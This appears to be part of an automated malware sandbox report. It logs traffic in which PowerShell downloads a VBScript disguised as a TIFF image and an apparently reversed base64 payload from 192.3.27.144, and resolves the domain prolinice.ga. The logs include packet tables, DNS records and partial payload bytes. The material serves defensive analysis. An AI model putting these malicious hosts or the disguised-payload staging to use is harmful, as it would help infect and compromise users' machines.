Jan 8, 2025 11:09:50.356486082 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.356514931 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356532097 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356573105 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.356595039 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356606960 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356643915 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.356803894 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356813908 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356832027 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356842041 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356848955 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.356861115 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.356878042 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356904030 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.356919050 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357017994 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357064962 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357106924 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357319117 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357331038 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357341051 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357362032 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357376099 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357453108 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357522964 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357605934 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357614040 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357650042 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357747078 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357790947 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357832909 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.357841015 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357867002 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357877970 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.357918024 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358129978 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358155012 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358181000 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358232021 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358241081 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358278036 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358364105 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358372927 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358383894 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358397007 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358400106 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358419895 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358428001 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358433962 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358462095 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358618975 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358628988 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358668089 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358808041 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358818054 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358859062 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358861923 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358871937 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358942986 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.358963966 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.358989954 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359002113 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359081984 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359091043 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359127998 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359297991 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359309912 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359327078 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359334946 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359370947 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359380960 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359390974 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359426022 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359581947 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359606028 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359647036 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.359762907 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359775066 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359785080 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.359810114 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.380147934 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.380194902 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.380280018 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.380290985 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.380301952 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.380321026 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.477658033 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.481796980 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.481821060 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.481836081 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.481844902 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.481857061 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.481884003 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.481899023 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.482172966 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482183933 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482194901 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482217073 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.482235909 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.482623100 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482633114 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482642889 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482654095 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.482672930 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.482685089 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.603435040 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603461981 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603473902 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603483915 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603496075 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603507042 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.603528023 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.603588104 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.608125925 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.612899065 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.433537960 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:53.438553095 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.438627005 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:53.438980103 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:53.439060926 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:53.443769932 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.443955898 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.443969011 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.443979979 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:53.443991899 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:54.445406914 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:54.445487976 CET	80	49746	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:54.445641041 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:54.476819038 CET	49746	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:54.481611013 CET	80	49746	46.173.214.14	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:09:04.181592941 CET	51751	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:09:48.670789957 CET	60707	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:09:48.877963066 CET	53	60707	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 11:09:04.181592941 CET	192.168.2.4	1.1.1.1	0x36c1	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:09:48.670789957 CET	192.168.2.4	1.1.1.1	0xea21	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 11:09:04.188597918 CET	1.1.1.1	192.168.2.4	0x36c1	No error (0)	res.cloudinary.com	resc.cloudinary.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 11:09:48.877963066 CET	1.1.1.1	192.168.2.4	0xea21	No error (0)	prolinice.ga		46.173.214.14	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

192.3.27.144

prfkokybvrvkyi.org

prolinice.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	192.3.27.144	80	7608	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:08:59.061459064 CET	319	OUT	GET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.27.144 Connection: Keep-Alive
Jan 8, 2025 11:08:59.528511047 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:08:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 16:12:53 GMT ETag: "36dfb-62b200471edfb" Accept-Ranges: bytes Content-Length: 224763 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: 44 69 6d 20 73 68 20 27 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 73 6f 20 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 6f 72 6d 61 74 20 27 53 74 72 69 6e 67 46 6f 72 6d 61 74 74 65 72 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 66 6f 6c 64 65 72 20 77 68 65 72 65 20 74 65 73 74 20 73 75 69 74 65 20 73 63 72 69 70 74 73 20 61 72 65 20 6c 6f 63 61 74 65 64 0d 0a 44 69 6d 20 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 72 6f 6f 74 20 66 6f 6c 64 65 72 20 66 6f 72 20 74 68 69 73 20 70 72 6f 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 69 6c 74 65 72 20 27 73 74 72 69 6e 67 3a 20 66 69 6c 65 6e 61 6d 65 20 66 69 6c 74 65 72 20 66 6f 72 20 73 65 6c 65 63 74 69 6e 67 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 74 65 73 74 20 73 75 69 74 65 73 2e 0d 0a 44 69 6d 20 63 61 70 74 69 6f 6e 20 27 73 74 72 69 6e 67 3a 20 4d 73 67 42 6f 78 [TRUNCATED] Data Ascii: Dim sh 'WScript.Shell objectDim fso 'Scripting.FileSystemObjectDim format 'StringFormatter objectDim suiteFolder 'string: folder where test suite scripts are locatedDim projectFolder 'string: root folder for this projectDim suiteFilter 'string: filename filter for selecting integration test suites.Dim caption 'string: MsgBox/PopUp title bar text.Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators.Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables.Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push.Dim nextItem 'integer: current index of the prepItems array.Dim settings 'integer: controls MsgBox/PopUp behaviour.Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout.Dim flagFile 'string: filename of a temp file used by Setup.vbs.Dim versionLink 'web pag
Jan 8, 2025 11:08:59.528531075 CET	1236	IN	Data Raw: 65 20 77 69 74 68 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 0d 0a 44 69 6d 20 65 64 69 74 6f 72 20 27 64 6f 63 75 6d 65 6e 74 20 65 64 69 74 6f 72 0d 0a 44 69 6d 20 70 6f 77 65 72 73 68 65 6c 6c 20 27 66 69 6c 65 73 70 65 63 20 6f 66 20 61 20 70 77 Data Ascii: e with version infoDim editor 'document editorDim powershell 'filespec of a pwsh.exe, if available; or just "powershell"Const CreateNew = True 'for the OpenTextFile method.Const Enter = 13 'window.event.keyCode for the Enter keyConst
Jan 8, 2025 11:08:59.528542995 CET	1236	IN	Data Raw: 65 73 74 4c 61 75 6e 63 68 65 72 22 0d 0a 20 20 20 20 64 65 66 61 75 6c 74 44 6f 63 47 65 6e 73 20 3d 20 22 65 78 61 6d 70 6c 65 73 5c 47 65 6e 65 72 61 74 65 2d 74 68 65 2d 43 53 68 61 72 70 2d 64 6f 63 73 2e 76 62 73 20 7c 20 65 78 61 6d 70 6c Data Ascii: estLauncher" defaultDocGens = "examples\Generate-the-CSharp-docs.vbs \| examples\Generate-the-VBScript-docs.vbs" defaultGits = "%ProgramFiles%\Git\cmd\git-gui.exe \| %ProgramFiles%\Git\git-bash.exe \| %LocalAppData%\Programs\Git\cmd\git
Jan 8, 2025 11:08:59.528556108 CET	672	IN	Data Raw: 20 20 20 49 66 20 2e 45 78 69 73 74 73 28 20 22 65 64 69 74 6f 72 22 20 29 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 64 69 74 6f 72 20 3d 20 2e 49 74 65 6d 28 20 22 65 64 69 74 6f 72 22 20 29 0d 0a 20 20 20 20 20 20 20 20 45 6c Data Ascii: If .Exists( "editor" ) Then editor = .Item( "editor" ) Else editor = defaultEditor End If End With prepItems = Array("" _ , "UpdatePrePushDocs" _ , "RunSetupUninstall" _
Jan 8, 2025 11:08:59.528568983 CET	1236	IN	Data Raw: 0d 0a 0d 0a 53 75 62 20 70 72 65 70 42 74 6e 5f 4f 6e 43 6c 69 63 6b 0d 0a 20 20 20 20 6e 65 78 74 49 74 65 6d 20 3d 20 30 0d 0a 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 45 6e 64 20 53 75 62 0d 0a 53 75 62 20 41 77 61 69 74 4e 65 Data Ascii: Sub prepBtn_OnClick nextItem = 0 AwaitNextItemEnd SubSub AwaitNextItem ClearFeedback nextItem = nextItem + 1 If nextItem > UBound( prepItems ) Then nextItem = 0 Exit Sub End If windo
Jan 8, 2025 11:08:59.528580904 CET	1236	IN	Data Raw: 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 2c 20 64 6f 63 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 68 2e 52 75 6e 20 63 6d 64 2c 20 68 69 64 64 65 6e 0d 0a 20 20 20 20 20 20 20 20 45 6e 64 20 Data Ascii: projectFolder, doc _ )) sh.Run cmd, hidden End If Next AwaitNextItemEnd SubSub RunSetupUninstall Dim response If Not uninstallChkBox.checked Then AwaitNextItem Exit
Jan 8, 2025 11:08:59.528594017 CET	1236	IN	Data Raw: 6c 73 65 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 20 70 72 65 70 49 74 65 6d 73 28 6e 65 78 74 49 74 65 6d 29 2c 20 31 2c 20 56 42 53 63 72 69 70 74 0d 0a 20 20 20 20 20 20 20 20 43 6c 65 61 72 46 65 65 64 62 61 63 6b 0d 0a 20 20 20 Data Ascii: lse window.setTimeout prepItems(nextItem), 1, VBScript ClearFeedback End IfEnd SubFunction UninstallFromProgramsAndFeatures Dim key : key = format( Array( _ "%s\VBScripting\UninstallString", uninstallKey _
Jan 8, 2025 11:08:59.528616905 CET	1236	IN	Data Raw: 76 62 4c 66 20 26 20 76 62 4c 66 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 49 66 20 61 6e 79 20 70 72 6f 63 65 73 73 65 73 20 61 72 65 20 75 73 69 6e 67 20 74 68 65 20 70 72 6f 6a 65 63 74 20 6d 6f 64 75 6c 65 20 6f 72 20 6c 69 62 Data Ascii: vbLf & vbLf & _ "If any processes are using the project module or library files, then the C# compiler will not be able to recreate those files.", _ settings, caption) Else response = vbYes End If If vbY
Jan 8, 2025 11:08:59.528637886 CET	328	IN	Data Raw: 65 6e 0d 0a 20 20 20 20 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 46 65 65 64 62 61 63 6b 20 22 57 61 69 74 69 6e 67 20 66 6f 72 Data Ascii: en AwaitNextItem Exit Sub End If Feedback "Waiting for tests to complete.<br><br>After each test suite finishes, and after inspecting for errors, close the console window(s)." path = format( Array( _ "
Jan 8, 2025 11:08:59.528651953 CET	1236	IN	Data Raw: 68 20 29 2e 46 69 6c 65 73 0d 0a 20 20 20 20 20 20 20 20 49 66 20 62 69 74 43 61 6e 63 65 6c 20 41 6e 64 20 53 75 69 74 65 52 65 73 75 6c 74 28 20 66 69 6c 65 20 29 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 43 6c 65 61 72 46 65 65 Data Ascii: h ).Files If bitCancel And SuiteResult( file ) Then ClearFeedback Exit Sub End If Next ClearFeedback AwaitNextItemEnd SubFunction SuiteResult( suiteCandidate ) Dim response 'i
Jan 8, 2025 11:08:59.533556938 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 20 3d 20 4d 73 67 42 6f 78 28 66 6f 72 6d 61 74 28 41 72 72 61 79 28 22 52 75 6e 20 25 73 3f 22 2c 20 69 74 65 6d 29 29 2c 20 73 65 74 74 69 6e 67 73 2c 20 63 61 70 74 69 6f 6e 29 0d 0a 20 20 Data Ascii: response = MsgBox(format(Array("Run %s?", item)), settings, caption) Else response = vbYes End If If vbYes = response Then sh.Run format(Array("""%s""", item)),, synchronous ElseIf vbC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	192.3.27.144	80	7948	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:09:23.401454926 CET	83	OUT	GET /250/evenmegoodfor.txt HTTP/1.1 Host: 192.3.27.144 Connection: Keep-Alive
Jan 8, 2025 11:09:23.874324083 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:09:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 16:11:41 GMT ETag: "c558-62b2000228871" Accept-Ranges: bytes Content-Length: 50520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874382019 CET	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874409914 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874425888 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
